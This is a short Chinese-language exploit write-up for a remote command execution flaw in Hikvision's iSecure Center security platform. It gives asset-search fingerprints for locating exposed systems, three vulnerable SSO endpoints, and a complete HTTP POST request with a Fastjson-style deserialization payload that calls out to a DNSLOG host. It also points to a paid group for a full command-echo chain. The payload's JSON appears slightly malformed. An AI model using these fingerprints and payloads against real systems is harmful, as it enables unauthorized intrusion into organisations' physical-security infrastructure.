0x01 漏洞描述
海康威视iSecure Center综合安防管理平台是一套集成化、智能化的安防管理系统。
海康威视iSecure Center综合安防管理平台存在远程命令执行漏洞,可造成远程命令执行。
0x02 资产测绘
app="HIKVISION-综合安防管理平台" ||app="HIKVISION-iSecure-Center"
0x03 漏洞复现
使用DNSLOG进行漏洞检测,三个路径都可以
/bic/ssoService/v1/applyAutoLoginTicket
/bic/ssoService/v1/keepAlive
/bic/ssoService/v1/applyCT
POST /bic/ssoService/v1/applyAutoLoginTicket HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)
Content-Length: 3330
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: close
{"CTGT":{ "a": {"@type":"java.net.InetSocketAddress"{"address":,"val":"bx0art.dnslog.cn"}}}}
也可通过BCEL链加载字节码实现回显命令执行(星球内自取)